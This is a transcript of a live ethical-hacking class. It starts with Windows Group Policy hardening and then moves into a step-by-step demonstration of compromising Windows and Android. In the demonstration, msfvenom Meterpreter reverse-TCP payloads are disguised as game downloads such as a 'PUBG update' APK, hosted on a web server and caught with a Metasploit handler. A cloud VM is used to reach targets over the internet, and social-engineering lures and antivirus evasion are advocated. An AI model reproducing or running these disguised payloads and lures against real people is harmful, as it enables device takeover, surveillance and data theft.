Yes, sir, we are live. We can start now.
Hi everyone, Vinayak here. Welcome back to the show, and we have brought you certain new chapters. These are the topics in here that we are going to discuss. So, securing using GPO and hacking Windows, hacking Android. So, you will be doing real hacking of Windows and real hacking of Android today, right? So, with that, let's get started. So, first of all, let's have a discussion on what is GPO, Group Policy Objects. So group policy objects is a way of managing and maintaining security in your Windows infrastructure. Like, let us say I'm giving you an example. When you go to an ATM and you type a password 3 times incorrectly, your account gets locked, right? So how does this happen in fact? Otherwise, let's have an example that we have got people who just poke down to your control panel in your Windows operating system, isn't it? So can we block this access to control panel? So now let's take another scenario over there. So let us say that I want that my system's password should not be less than 10 characters in there. So all these sort of uh, operations can be done using something called group policy, right? So with that, let's start it and jump into group policy. So for doing group policy, you require up a Windows system. So I already have a victim Windows system in there, right? So I log on into the box. And I'll type in here gpedit.msc. So once you are in gpedit.msc, so what you can do, you can just scroll down to Windows settings over there inside computer settings, computer configuration, I mean to say. So go to computer configuration, Windows settings. And here we have your security settings. And here we have your account policies. And here we have password policies. Just click on this password policy. So see, the minimum password length is 0 characters, right? So anybody can just type in or enter into your system without creating up a password there. So this is not a safety point in there. So what we have to do, we have to make it a bit complicated. So let's say that once somebody wants to enter into my system, so he should have minimum of 10 characters of password. So click on this and click on OK. So now there are certain other aspects in there, like minimum password age. Minimum password age is 0 days. That means anybody can change the password at any point of time. So maximum password age is the maximum amount of time the password will be valid. Like in this case, the password is going to be valid for 42 days. So let's say that I want everybody to change the password every month. So I'll just make it to 30. So everybody has to change his password. Whosoever has an account in the system has to change the password after every 30 days over there. So in first password history, 0 passwords remembered. So I'll just make it like 3 passwords remembered. So he cannot just type in his 3 old passwords there, right? So with these settings intact in there, so what do we have to do? We have to just close this one. We'll come back once again over in there. So this is about your password policy that we have. So just go to run and type in there command prompt and type in there gp update /force. Okay, so the policy has been updated now, right? Now we'll go for a creation of a user account. So right click over here, go to computer management and local users and groups, go to users, and we have already a user account called Harry. So let's set his password. So I'm just setting his password. So let's say 111 So press enter. So it's telling that the following error occurred while attempting to set the password for Harry. The password does not meet the password policy requirement. Check the minimum password length, password complexity, and password history requirement. So let's make it like 123456789 @QWERT, right? So 123456789 @QWERT. That's it. Okay, done. So let's go and log off this guy. We are here. Just restart the system. And once the system is restarted, the system will exactly gain up the policy that we have adjusted in there. Okay, so we are back. Click on this and I'll just log on as Harry with the new password 123456789 @QWERT. So now let's say this guy has logged on and he wants to change his password on his own. So will he be able to provide? So what we have to test? We have to test three things. So like what is the minimum password? What is the minimum password length that he can provide? And what is the password history requirement history being enabled over there? Okay, so let's go to settings and change passwords accounts. Find a setting. Let's see if I have got change password here. Change password. Otherwise, I can just send up control or delete. Simple way. So I can just send up control or delete and it will ask to change a password. So change a password. So Harry needs to change his password. So his old password is 123456789 @QWERT. And now he likes to assign new password 111 and he likes to confirm it. So just click on this and click on go. So the username or the password is incorrect. So okay, I'll just try it once again. Give me a sec. Just make it full screen. Okay, so the old password is 123456789 @QWERT, and he supplies the new password as a simple password. So click on this, click on okay. So unable to update the password. The password provided for value provided for the new password does not meet the length, complexity, or history requirements of the domain. Right. So click on OK. Now we'll go over here and we'll change it like 123456789 @QWERT, and I'm just giving the old password 123456789 @QWERT, and again the same password 123456789 @QWERT, and it's the same password that I have provided. So again, it's not taking up that password. Why? Because this time it's conflicting with that scenario in where we have told that you have to remember three old passwords. So I have to just change it to something else over here. So like 123456789 @QWERT, and I'll just name it as 987654321 @QWERT, and 987654321 @QWERT. So this is that. So this you can even use on your laptop to protect your laptop, right? So you can just say that if somebody wants to change his password, he should keep at least 6 to 10 characters of password. So minimum 7 characters or 8 characters is the industry standard. Okay. So we have to keep minimum 8 characters of password as the industry standard over there. On your laptop, you can do that. Okay, now let's come to the next scenario. Next scenario is, let us say that if he changes the password or he fires up the password 3 times wrong in the same go, so his account should get locked, or anybody's account should get locked, right? So I'll just restart the system, and this time I'll just see that this guy is logged on, or administrator is logged on, right? So I'll just reboot the system here. Okay, so I'll log on as administrator because Harry cannot exactly change up the policy. 1234 @ABC. Here we go. And what we will do? We'll just change up the policy. Go to run and gpedit.msc. Again, go to this Windows settings, security settings, account policies. This time I'll lower up the policy account policies a bit because 10 characters is too much. So I'll just make it like 6 characters or something. So 6 characters, and the rest of the things are okay. I'll just make it 0 passwords remembered for simplicity's sake. Just for simplicity's sake. In real time, you should not do that. Okay, now I'll just go for account lockout policy. So what is account lockout policy? Account lockout policy says that if somebody enters password for n number of times wrongly at a go, so his account or his or her account should get locked. Like I'll just set up 3 over here, right? So if I set up 3 over here, this says that his or her account will be locked after 3 invalid logon attempts, right? And for how many minutes or how many hours it will get locked? It will be remained locked for half an hour, so 30 minutes. So I can just change up this threshold if I like. So like I can just make it something like 60 minutes, or even I can make it 5 minutes. So I'm just making it 5 minutes for simplicity's sake. So if I just make it 5, the second reset counter is automatically set. So I have set in over here that after 3 invalid logon attempts, the account will be locked for 5 minutes. So okay. So the policy, in order for policy to take effect, we have to restart the system. So right click over here, shut down. You can run GP update even, but GP update sometimes might not work. So better restart the system. Mohammad Zaki, you continue with the attendances and assignments over there, and I hope that you will be eligible for certificates. Sandeep Gupta, you are getting this temporary failure in name resolution because your network is not connected properly. So do one thing, you just bridge your network over there. So right click, just look at the screen. What do you have to do? Right click on this, go to settings, and see this is bridged. Let it come. So see that this network adapter is bridged and replicate physical connection status is on over there. After that, you connect your mobile or this laptop to your hotspot, and it automatically this virtual machine gets connected. So there is an issue with network connection. That is why name resolution error is out there. Okay, 1, 2, 3, 4 at the. Okay, so just let's try with Harry. So Harry, he gives a wrong password. So like 111. So his password is something 98765431. So 23456. Okay, so wrong password. So somebody is trying to brute force his account over there. We are simulating this one. So okay, so this password is wrong. So now 3 times he has entered wrong password. So let's enter some password over there, random password. So account is the referred account is currently locked, and he may not be able to log in as of now. So just click on OK, go to administrator, add 1234 at the rate ABCD. Now, let's say Harry calls up the customer care, right? So Harry calls up the customer care, or Harry calls up this guy who owns this machine, and he tells that, see, my account is locked. So can you open up my account? So after 5 minutes, it will automatically unlock over there. But certainly, let's say that threshold is like say 2 hours or 120 minutes or so. So if he wants to unlock his account instantly, he should go to computer management. The administrator should go to computer management, go to local users and groups, go to users, right click on that administrator, go to properties, and see here the account is logged out, right? So this account is logged out. Particularly he will have to wait for another, what do you say, 5 minutes for his account to, sorry, this Harry, his account is logged out. So if he has to wait for another 5 minutes for the account to just enable, otherwise just this checkbox can be made off and apply and okay. Now Harry can just log on without a problem in there. Just log off from here. Let's restart the system once again and see that Harry is able to log on. If we change the time to 30 minutes plus, will the account get reactivated instantly? No. Account will not get reactivated instantly. So it will be reactivated after 30 minutes only. Got that, Anshuman Mishra? Once you set the threshold, it will be activated once the threshold is over. Okay, so let's log on as Harry at 198765431 at the rate QWERT. So he has logged on to the box. Okay, so this is done. So now we'll see that. Okay, now this Harry guy, he's very naughty. You know what? He goes to control panel and he tries to poke into the nose of the system. So he goes to the control panel here. Right, and he tries to do a whole lot of stuff in here. So I want to block access to control panel for this guy. So let's see how we can do that. So just restart the system once and log on as administrator. You can log off and log in. So better I'll restart the system so that every settings is particularly calm. Yes, through Alex Philip, correct. Through administrator only you will be able to fix up this issue. This guy cannot fix the issue on his own. Harry cannot fix up this issue on his own. Okay, so let's log on as administrator and 1234 at the rate ABC. So now I have to just be poke into this system and I am missing with this point. So let's see if I am able to find that. So how to block the control panel. So let's go to administrative templates and control panel and prohibit access to control panel and PC settings. So this is the setting that exactly is required. So how do we go there? So earlier we were poking onto computer configuration Windows settings. Now we are poking onto user configuration, administrative templates, control panel. So click on this setting and prohibit access to control panel and PC settings. So enable it. So once this setting is enabled, click on OK. So this guy will not be able to access his control panel over there. So now let's restart and test this one. Okay, in the meantime, it's starting. So has it started? Has it? No, it has entered into the recovery mode. Load correctly. Okay, so I'll just do one thing. I'll just revert it to snapshot manager once again and do the stuff once again. So this entered into the recovery mode. So resume this setting. So a bit of problem with the system, not big size. Okay, in the meantime, the system is recovering. I'll just answer to a few questions in there. Sir, what is the computer password for hacking? The user computer password for hacking is your BPG is the user account and 123456 is the password. What is it, the name? Brajesh. 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 Yeah, Brajesh. BPG is the username and 123456 is the password for Kali. And administrator is the username for Windows and 1234 at the rate ABCD is the password for this. What do you say? Admin Windows admin. So Dheeraj gpedit.msc is not working. I'm pretty sure it should work. So it should. I don't know where are you making it work particularly, but again, it should work. There is no big anything that we are exactly mistaking over there. So gpedit.msc works everywhere. So I'll just restart the system once and restart it properly. I was just messing up over here, so we should have restarted it this way. I'm not sure if Ansari, if there is a lusmgr.msc command available for lockout. I'm not sure about it. So, guys, this screen is in this is full screen over there. I don't think much of zoom is required. So you watch it on a computer better. AG. Brajesh, I didn't get your questions, sir. IP address using computer hacking. I didn't get your question. What do you want to ask? Yes, Ansari, I know that screen is proper. Thank you, Ansari. Thank you for your comment. So IP address used in computer hacking, you don't need to use any IP address as such. It automatically takes up the IP address. If at all you want to use any IP address, look at my go to my day 2 session and have a look. We can hack using only IP ready. We can hack. We can do a denial of service attack using IP, just using IP address. Devraj Sandeep Reddy. Okay, so we are back. So let's do that stuff once again. So I'll just go to run gpedit.msc and we will set up that control panel stuff. And here we go. Administrative templates and control panel and prohibit access to control panel and PC settings enabled and okay. Now I'll just restart the system and check it with Harry's account that Harry is not able to access the control panel. So restart the system once. You don't need to use Sanu KS. You don't need to even use Sodan. Instead, you can use up a Nessus vulnerability scanner to scan up for the vulnerability. Sodan is a search engine, correct? Yes, Goel, you are right. Lokesh Goel. So Sodan is a search engine. And I don't know that how the download of the virtual machine has been suspended. We'll just have a look. I'll just have a look and let you know. Okay, so we'll go over here and we'll log on as Harry. He logs onto the box. Okay, where did we go? Yes, we have to see that the control panel has been blocked access. Yes, see here. The operation has been cancelled due to restrictions in effect on this computer. Please contact your administrator. So the control panel is now blocked. So we have successfully completed one of the exercises wherein our system has blocked access to control panel, right? So I'll just sign out and I'll log in as administrator and enable this control panel. Okay, administrative control panel. And where are we? We are into control panel, correct. And prohibit access to control panel, just enable it. Because we'll require it, or there might be or somewhere. So not configured, and it is done. So I'll just log off and log back in. Sign out. I'll just log out. Okay, so this part of the session is over. So guys, if you have any questions, please put up. Can you put me on that cam, please? Shoaib, can you put me on that cam, please? Yeah. So let me take up a few questions. So what control panel prohibition for all users? Yes, control panel prohibition is for all the users. So if you want to control, restrict access for, let us say, 5 or 6 users, you have to use something called domain environment over there. Ansari. That is altogether a different story in there. So come to the full, you can say full course, and we'll just deal with that later. Okay, so what were we exactly up to? Stop screen share. Okay, so we were at, sir, is Google settings is cookies all block hacker not hack my computer? The method of working is same in it. The method working is same in network. Chris says exam is necessary for to. Yes, exam is necessary to earn a certificate. Hardik, exam is necessary. Can we break the password using live OS? Uh, you can break the password. I wasn't able to do the assignment plus, but I submitted the ones I know. Will you cover it? Yes, we'll consider your assignments. How to deal with filtered port in. So for dealing with filtered port in Nmap, send a small packets with a small MTUs in there, small maximum transfer units. Got that, Anshuman? If there is a filtered port, use Nmap with a small packet. The packet size should be small. Yes, how can we block screen resolution and personal block the display? Sanjay Sony block access to display in control panel itself. We have got an access to, so I'll just show it to you. Give me a second, Sanjay. Screen share. So we have something called. So I'm sharing. Yes. So I'll just come back. Wait a sec. So go to run and type in the gpedit.msc. And once you are in gpedit.msc, you have got here something called display. So you can just prohibit access to display in control panel. So control panel, and you have got display in here, right? So disable the display in control, just disable the display in control panel. So not entirely control panel will be just blocked. In that case, only your, what do you say? This display will be blocked in control panel. Okay, so where did we go? Muklin, if a hacker accesses Windows login using backdoor, is it possible? Uh, so what is possible if you apply the policies, even if he accesses using the backdoor, he will have restrictions to the policy. Lucifer, sir, what is the idea? So, what is the idea about hacking Windows and Android in attempt? And what about secure time to get out from the hacking machine without knowing the victim how it is possible? You know what? I'll just show you over there that it will not be even known to the hacker that his sorry victim that his machine is particularly being hacked. If once he executes the script over there, let me show you how to exactly hack Windows. So okay, so let's come to Windows hacking now, right? So let's start. Switch off my cam, please. Yeah. So switch off my cam. Yeah. So we'll just hack up Windows now. So this is the Windows system. Who is logged on? So this administrator is logged on, I guess, right? So I can just type in here at the command prompt, who am I, and I'll get this information. Who am I? So I am administrator. Okay. So let's do something, and so that this Windows can be hacked from Kali, right? So where is my Kali? So here is my Kali, I guess. Where did it go? So I guess that it is running somewhere. So power it off. I'll just bring it back once again. So victim's machine got offed. So Kali. Stop. Kali was running somewhere in the background. See? Okay, no problem. So we'll just access this from the location d:/document/virtual machine stp something. Okay, here we go. d:/. virtual machines, where is the documents, and we have virtual machines, and we have your STP2020, and we have Kali PC here. So Kali PC here. Let's just access this Kali PC right from this place. Here we go. So the Kali is here, the victim is here. Let's power on this victim, and let's power on this Kali. So in order to hack your Windows system, you require a Kali machine and a victim machine. Right. So victim is always a victim. You will require obviously a victim. Whom will you have? Okay. So here we go, and PPG, and 12345 is the password. We'll first of all enable SSH into it, right? So that this system is under full control of us through a SSH protocol, and we'll be able to use it properly, right? So the command sudo hyphen and 123456 is the password, and systemctl enable SSH, right? So SSH is now enabled. So type in their IPA, just look at the IP address. So IP address is 10.10.10.171. So what we'll require? We'll require Git for Windows for this to, or putty to access this one. So just download Git for Windows from any of your website in there. So this is Git for Windows there, right? So Git for Windows can be downloaded from any website. Just let me show you over there. So this is I might have shown you earlier, but you can download it from gitforwindows.org. So this is the same Git for Windows. Look at the icon there. So this is Git for Windows, right? So you download it and install it. So this is this is your Linux on Windows. So emulation of Linux on Windows. SSH BPG at 10.10.10.171. Right? What BPG at I didn't give. It's 210 at the rate. So it's asking for the password. We are onto that machine. I guess it's properly visible, isn't it, guys? Just I'm keeping it side by side so that you understand it properly. Okay, so what we'll do, we'll just sudo su hyphen and 123456, and after that I will use some commands over there to create up a venom. So what is the command that is used to create a venom? So venom means an exploit. So first of all, we'll have to create up an exploit there, right? So what we will do, there is a syntax for that. So this is the syntax here. So just first of all, let's create up a website. So okay, there are 4 steps. So first of all, create a web server. Right? Number 2, it's number 2. Okay, just I'll write 2. I just missed out one. So create a venom, or venom. Venom, in details we call it exploit. Right. And host on web server. number hash 3 here. So let the victim download a Venom, right? And number 4, wait with a interpreter session using MSF console, right? And then fifth step, let him execute the exploit. These are the steps that we have to follow. So first of all, we'll create up a web server. So apt install httpd. So okay, so http package is not available. So we have another package, Apache. This is even a web server. HTTP is a web server generally used in CentOS environment, but we are not using CentOS. This is the Debian side. So Debian side uses Apache too. Uh, Devraj Sandeep Reddy, I'll just let you know how to work on you can say globally how to attack a system over there. You will understand it. Just give me a second. Right. This works on LAN, but you can attack even global system, that means systems located in any part of the world. Give me a second for that. Okay, so what we'll do now, we'll host up a website. So cd slash var slash www slash html and mkdir, and I'll just name here Counter Strike. False, not this. COUNTER Counter Strike. So that he downloads this one. If it feels like that he's downloading a game. So mkdir Counter Strikes. Okay. So cd Counter Strike. Now what we will do? Just let me expand this one. Now I'm just pasting up a lengthy command in there. So this is the syntax to create up a Venom. Right? So what we'll do inside Counter Strike, we'll create up a game.exe, and here we will change it to the IP of Kali. IP of Kali is 10.10.10.171. 10.10.10.171 and -f. So what we are doing with MSF Venom, we are using this payload, Windows Meterpreter Reverse TCP, right? And for platform of Windows, that to x86 version, that means that works on Intel processors, we are using an exploit called x86 Sikata Janai. Sikata Janai is a exploit's name, right? And for which system we are creating the exploit? So we are creating the exploit for any system that will revert our their data to 10.10.10.51. What is the file type? File -f means file type. File type is going to be exe. And where is it going to be created? It's going to be created in /var/www/html/counter-strike, the same directory that we created over there. So if you just execute this one, it will take a bit of time to just, you can say, create up the exploit. Wait a second, it's creating. Okay. For those who just missed out the commands because of blocking of the screen, this is the command. So msf venom -p windows meterpreter reverse tcp, and this is the platform, right? So this is the command in there. Okay, so just pressing Control C. So this is this was the command. Now what we have to do now, this website exactly contains, so if you just go over to a Chrome over there and open up any browsers tab in there, and you will just be able to access this one. So http://n.171/ I don't think you'll be able to access it. I know that. Why? Because the connection is refused, because the web server is installed but it's not running. So systemctl enable Apache 2 and systemctl start Apache 2. So this is done. If we just refresh this page once, we should get that game. So you can see that game.exe is there. So obviously, if it is showing on my system, it should show up on victim system as well. So just let's see if what. So now see the defender is on this system. So let's see if the defender works or not. Okay. So I'll go to Chrome. http://10.10.10.171/counter strike. Click on that game.exe. So this game.exe gets downloaded, right? So let's execute this one. So click on this and click on run. So is it executing? Right, it's executing, right? So okay, so I will just come over there once, come back once again onto this machine. So I guess that it's downloaded in games. Sorry, it's downloaded in downloads. Let's check that once again. Where it is downloaded. So it is downloaded in downloads, right? So we'll come back over here. Now what we have to do over here, we have to just go over here and cd into your directory, right? So ls, do we have anything over here? Yes, we have something called recon. So I'll just create one more two files. So I'll create touch.txt, let's say. Okay, so and here I'll create a file called b.txt, just for your understanding, to download and upload the files. So for simulation sake, so let's say b.txt. This file is here, b.txt is on this side and a.txt is on my side. Now what I'll do, I'll just type in here msf console. Now attack starts. Okay, so your system has done, what do you say? We saw gone through MSF5. The system is on MSF5 over there. Now type in here, use multi-handler. Use multi-handler. Now type in here set payload Windows / meterpreter / reverse underscore TCP. We are into payload over there. So type in here show options. Hope you remember that we have set up lhost earlier that as 10.10.10.71 in this command. So lhost is this is our lhost, isn't it? So the same lhost is appearing over there. So if this lhost is not appearing in this case, just type in here set lhost set lhost 10.10.10.170. And if it is not appearing, in my case it's appearing, so it doesn't matter at all. Now we are ready to exploit. So type in here exploit -j -z and wait for the wait and watch what happens. So started a reverse meterpreter. So if this guy executes this game, see here, we got a meterpreter here, we got a session here at this place. As he executed this game, this is an exploit. This is a virus sort of thing that we have sent to this guy, right? So if he executes it, so we get up a meterpreter session. Just execute over there. Even here sessions. You see that we have got one session from this IP address, right? So type in here sessions session -i and 1. So this is the ID of the session, right? Sessions. So we are into meterpreter over here. If you type in sysinfo, I'll be able to see that we are on Windows machine, right? So now what are the commands that we can type in? Just type in here question mark. These are the commands that we can exactly type in at this position, right? So if I type in ipconfig, this will display the IP address of that machine. So this is going to display the IP address. This is displaying the IP address of that machine particularly. See here 10.10.10.102. Okay, so some new commands in there. So if I just want to go into that system over there, just access the shell. So or first of all, let's upload some file. So upload, we have a file called a.txt. Now see, I have uploaded a.txt. So here comes the a.txt, right? So I want b.txt into this. So this is something that b.txt has been written. I'll just name it as b. It's a wrong name written here. B. Okay, here we go. So if I type in, let us say, get b.txt, I'll get this file b.txt. Unknown. Okay, so it's not download, it's download b.txt. This file gets downloaded to my system. So I have got this. What do you say? This file b.txt in my system. I'll show it in a couple of seconds, right? If I type in a screenshot, I'll get a screenshot of this machine. So this screenshot is saved in /root/ this place, right? So there are so many commands that you can type in over here. So like webcam snap. So this will take a picture from the computer's camera. So this is not this is a virtual machine. So that is not going to work, right? So there are so many commands that works over there where you can exactly just poke into the machine. Okay, just showing you some nice things. Type in here shell. Okay, so you are onto that machine now. So C:/Windows/meterpreter/ this one. Okay, just showing you one nice thing here. So let's see the CPU utilization of the machine. Performance, the CPU utilization is not that much. It's around 49% or something like that, right? So just type in here PowerShell. So we are onto PowerShell, right? And type in here get file item. -recurse. Okay, first of all, cd/. I'm just making a mistake. cd/. And now type in there get child item hyphen recurs type it to get content. See the CPU utilization after that. We just created a virus into the system. What happened? Get child item hyphen recurs. That's a good term. Get child. Oh, say typing mistake. Typo. So get child item. CHILD ITEM. Get child item hyphen recurs. Type it to get content. You have made the system too busy in here. Can you see that? So now if you loop it, if you know real programming skills over there, so you can just plant the virus in such a way that whenever the system is becoming online or whenever the system comes up, it is exactly executing your stuff over there. Now certain people think over there that this can be done. Terminate, yes. Okay, so I'm just editing from here. Exiting from here. I'm just terminating the session now. So the session exactly contains the screenshot. Let me show you the screenshot. I'll just log on using root and the password for root 123456. Incorrect password 123456. Is it? Okay, just a second. PASSWD pass WD 123456. 123456. I'll reset the root password. I have reset the root password. So 123456, and we are into the system. So let me show you the screenshot and the file that I downloaded. Right. So I'll just go over here and type in here Nautilus, NUTILUS, Nautilus. Nautilus command is not wrong. Okay, no problem. So then let's go to this browser here, this one, or open folder. So this file manager is here. So you can see this screenshot here. So a.txt we downloaded, a.txt we uploaded, b.txt we downloaded, and this is the screenshot of the machine. So just let it open for a second. So this, can you see that? This is a Windows machine's screenshot. So if whatever he is doing, we can just take up the screenshot of the machine. Now, some of you might think that this is only possible in LAN. No, we can attack a machine from any part of the world. Just let me show you that how is it going to happen. Okay, for that, we'll go to Google Cloud Platform. Where did it go? Here is the wizard in here. Yes, JPG can be bound to a payload, right? Right. That is called steganography, right? So you'll do that. In this premium session, you will be able to do that. I'm just showing the glance of what basics are there in this whole scenario there. Okay, console.cloud.google.com. So let's see that how is a machine attacked from any part of the world. So I'll just close this one. No Kali, nothing is there. So I don't have Kali running. Only victim system is there, right? So even I'll delete this game from this place. I'll just delete this from this place. Yes. Okay, so we have two files. That's it. Okay, just I'll go over here. That is why cloud's understanding is important, so that you can hack machines from any part of the world. VM instances. Just click on create an instance. I'll name it as hacker. Okay. And we will take up a F1 micro machine. To hack a machine, you'll hardly have to spend around 50 paise per hour. Right, and we'll just change this to CentOS. So I'll use CentOS machine and CentOS 6 obviously. Click on select how much I'm spending. So yes, same amount. Okay, so allow HTTP, allow HTTPS. That's it. Anything to be taken? Nothing. So that's it. Create. So this whatever you are seeing is not in LAN. It's you are hacking a real-time system in a real-time world. In that case, we have Metasploit Deepak Dubey. If he has antivirus, we will evade the antivirus then. So we have we'll first of all detect what is the antivirus that is enabled in the system. So we have got exploits to evade there is antiviruses over there. So first of all, we'll disable his antivirus and then we will enter into the system. Or we will use some sort of DOS attack to disable his antivirus temporarily and then we'll let him exploit. Okay, so Google Cloud is free by default. Google Cloud is free for 3 months at $300, and it is almost free for one machine, right? Okay, so we'll discuss. Google Cloud has been already discussed in your first or second class, I guess. We are onto this SSH machine there. Yes, Lucifer, it is able to, we will be able to bypass antivirus through payloads. Yes, it is possible. Let it connect. Omkar, we'll come to that. How many machines can be hacked at a time? We can hack n number of machines at a time. It's not about the number of machines. It's about how fast you are, in fact. Okay. So we are into the machine. So let's sudo into this one. Sudo hyphen. I'll just copy and paste the commands in there as of now. So this Metasploit is installing. So the Metasploit was not installed on the system. So in cloud, the thing is that in Kali by default Metasploit comes in Google Cloud Platform. You spin up a machine like CentOS at just 50 paise per hour and create up an exploitable machine. Bhuvan Gowda. we are doing the same thing that you are asking, sir. Using a virtual machine, can we attack a real-time user? Using a virtual machine, you cannot exactly attack up somebody residing in US. But using Google Cloud Platform, obviously you can. Any way to Subhajit, any way to execute payload without clicking on or installing it? Yes, embed it into a website or something like that and force him to click on that. So like, pose it like it is a game or something. So that is something you have to do some sort of social engineering and all. Okay, so we are here, and same thing, we have to create up MSF Venom first of all. So we are going to okay, first of all, website creation, right? So yum install httpd. There it was Apache, here it will be httpd. Yes, same thing, but in a different way. So cd slash var slash www slash html and mkdir g PUBG new, PUBG new. Okay, this way. And after that, cd PUBG new. Okay, here we'll create the exploit. So I'll just copy this down and paste it over here. Okay, so this has to be changed. This one has to be changed to PUBG new. PUBG new, and let us say new version game update update dot exe. Okay, and this one has to be changed from IP of Kali to the IP of this machine over there in cloud. So what we'll do, where we will find the IP address. This is the IP address. This is the public IP address. It's same like your, what do you say, SE toolkit that we used. If you could remember my SE toolkit class. So where did it go? Yeah. So I'll just paste it over here. So the exploit is being created. Okay, the exploit is done. The exploit has been, final size of the exploit is this. So this exploit is created now. Now what we have to do, use multi-handler and wait for that guy to MSF console. Sorry, first of all, okay. And in fact, first of all, to start Apache. So service, let's see, service httpd start. httpd started. One more thing, let us pick up this SSH over there. So let's configure this SSH. So vi slash etc slash SSH slash SSHD underscore function. Right. So here we go. So we have something to be activated in here, right? I guess so. Permit root logon. Yes. And here we go for RSA public key authentication to be set to yes. So these are some of the things that we have to do on cloud. And we have challenge response of requirement password authentication. Password authentication is set to no, so we have to change it to yes. And challenge response authentication to be set to yes. So that is it. 4 settings. Yes, shift colon WQ. Oh, sorry. Escape shift colon WQ. Done. So service SSHD start. So now we are ready. Okay, so now what we'll do, I'll just SSH into this system using the IP address. So I'll just set down the password PASSWD pass WD for root. So I'll just set it Okay, here we go. So SSH root at whatever IP address I just pasted. No, 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 no. This is not the one that will copy. This is the IP address here. Copy, paste it. We are on 2GCP's machine. So yes, and we are ready to exploit. Let's consider that this is minimize this one, not required. So this is the victim system, and this is my machine on cloud, right? So let's see how will we access it over there. First of all, MSF console. So everything is done. So now we have to just get a game over there. Console. Okay. So MSF6 now use multi-handler. Same thing, same technique. Multi flash handler, and after that set payload Windows slash interpreter and slash reverse underscore TCP. Okay, and after that show options. Show options, yes, obviously show options. Here we have to set. So see here, this time in cloud the IP address of lhost is not set. So set lhost 0.0.0.0. Why 0? Because then it can reach anywhere. This exploits signals can exactly reach anywhere. That is why. Okay. Now nothing except exploit exploit hyphen j hyphen z. Wait and watch for this guy to execute it. Now this guy, I just embed this into a particular URL into my website, this exploit, and send it to him. I'll not send him directly, but since this is not the time to teach you web designing, I'm just sending it over there. So what is the IP address? IP address is 34 dot something, I guess. So just let us have a look. So it is 34.122. Just scroll it down on the sideway. So 34.122. 34.122.255 sorry 225.206 and slash PUBG new. Okay, so we got that game update. So just wait and watch now. So click on this game update. This is downloaded. Okay, so game update is not okay. So just click on this and keep. This was detected. Okay, so whatever. So click on this and click on run. So now I see I got as exploited systems interpreter over there. So click on enter and show. I just type in their sessions SESSIONS sessions, and we got that we are on one session. So sessions hyphen I one. We interacted with the session. We are on to interpreter. So just let me do one thing. Okay, I'll just send something over there. Task manager. I'll just open up a task manager performance and screenshot this one. CREEN SHOT. The rest of the command remains the same. Screenshot. Just got up a screenshot of that. So it's saved in slash root slash displays. Now how will I look at that? This is not GUI. This is not Kali. So in that case, just open up WinSCP. SCP can be downloaded directly from any Google search over there. So it's free of cost, nothing is charged. Go to WinSCP. Yes, you can open webcam of victim, but this is a virtual machine. I cannot open the webcam of a virtual machine. AG, got that? We'll exploit Dubey, Deepak Dubey. We'll exploit up a Windows system using that. Relax. We'll do that. Okay, so we will just access this one, this IP address. Just copy and paste it over here. And user account is root, and the password is yes. We access that machine. So I'll just go up one step. We are onto D drive. Okay, so I'll just drag. So this is my file. So I'll just bring it down to my machine, and I am here onto D drive. So if I click on D drive, I got that file over there. So refresh it. So this is the file. So this is the screenshot on my machine. Got that. That machine is exploited now. So you exploited it right from any part of the world. You exploited it right from any part of the world, right? You didn't understand this one. I hope that you understood this one, that we need not to be there in the local system in order to exploit this. Google, come on, man, why are you so worried about being charged? That is why we people are called Indians, you know. You type in there always, LWAYS, always free BCP. One F1 micro machine is always free over there in GCP. So one machine you can always use, right? So if you just see over there in compute engine, right? So let's see where this is there. So one F1 micro instance is always free here. Can you see that? With 30 GB hard drive and 5 GB per month of snapshot and 1 GB of incoming and outgoing traffic. So this is completely free. So why are you so much worried about being charged? So this machine I am running at just 17 rupees. So if you want to see my bill for Google account, let me show you. Google Voice. Okay, Google Cloud. So this is on August 2 I got, right? This is the one. See here, this much I am being charged. Can't you spend this much? Can't you spend this much for learning? Even if your account expires, as of now, if you register yourself, you will be getting $300 credit. Even after $300 credits expires, if you are using it for 1 or 2 hours, hardly 5 rupees, 6 rupees will be charged. Entire month, 15, 20 rupees. Can't you pay 15, 20 rupees? Okay, so let's exploit up Android phone now, right? Okay, so with this same, what do you say? Just I'm exiting as of now. With this and exiting from here. So we'll just exploit up a clearing the screen, and with the same Google Cloud Platforms machine, I'll just exploit up a, what do you say, Android phone. So let me bring up my Android phone in here. So I'll just drag it and bring it aside. What is the IP address of this one? Yes. Give me a sec. I'll just make sure that my phone is there. Here we go. Give me a second, guys. I'll just be back with a bit of setting in there. I am here, don't worry. Size, screen size. We are ready, and I'll just project my cell phone on the screen so that you experience what is happening. So here we go, and here we go. Ten dot 10.101. Okay, so I'm broadcasting my screen over here now, right? Okay, so what we'll do, we'll first of all create an exploit for this phone. So phone does not contain exe. Phone rather contains APKs, isn't it? So if it is on a what do you say, Android phone. So how will we exactly exploit an Android phone? We'll create up an APK. So I'll just copy this command. So same thing, we'll have to create up a Venom. Inside, instead of /root/desktop, I'll create it inside /var/www/html/pubg and mobile PUBG. Mobile PUBG. Okay. This is my file over mobile PUBG.apk. Right. So mobile PUBG.apk. And what is the IP address of Kali? I'll just move. I'll just see that IP address of Kali. Instead of IP address of Kali, I'll have to put in IP address of GCP. Just let me put an IP address of this. This is real-time hacking of an Android. You can hack any Android in this world with this way. So let's find out the IP address of this one. So here we go. So the IP address is 34.112 and this. So just let's copy this and paste it in there. Done. Okay, so done. Now an exploit has been created in a /var/www/pubg/mobile pubg.apk. Now I'll just access this. HTTP. I'll just do one more thing. I'll just switch off my 4G. http:// 10. What was the IP address? The IP address was, I guess, 34.122. So 34.122. Just we have to embed this one to something and send it to that guy. Hope you remember my SE toolkit class. So this is I don't think that I have to teach SE toolkit once again. How to embed it over there, you have to understand. So 225.206 and /PUBG mobile, I guess. Right. So why is PUBG mobile? Because we created PUBG new. Sorry, PUBG new NEW. So we got that PUBG mobile. You can see there, right? PUBG.apk. So I'll just click on this PUBG APK and download it. So this type of file can harm your system. Okay, I know that this type of file can harm my system, right? Okay, so now what we'll do, now we'll just create, he has downloaded it. So we'll not wait for his download. So we'll just wait for his to exploit. So I should have created up that multi-handler. So MSF console. We can exactly create up a permanent backdoor over there. We can create a persistent backdoor through scripts. Okay, so we are into MSF6. Okay, use multi-handler. Even if it deletes that file, it will be there somewhere running in the background. So multi-handler and set payload. This is the payload here, Android Meterpreter reverse TCP. So I'll just copy it down. I don't need to write it once again. copy it and paste it over here. Okay, we are set. And show options, obviously, show options, options. This L host is not set. So I know that L host is this IP address. So set L host, and L host is this IP address. Okay, it's control. Set L host. Oh, set L host is this. So I'll just type in verify it, show options. So options. This is done. Now what I'll do, I'll just type in here exploit. And I'll wait for this guy to open it 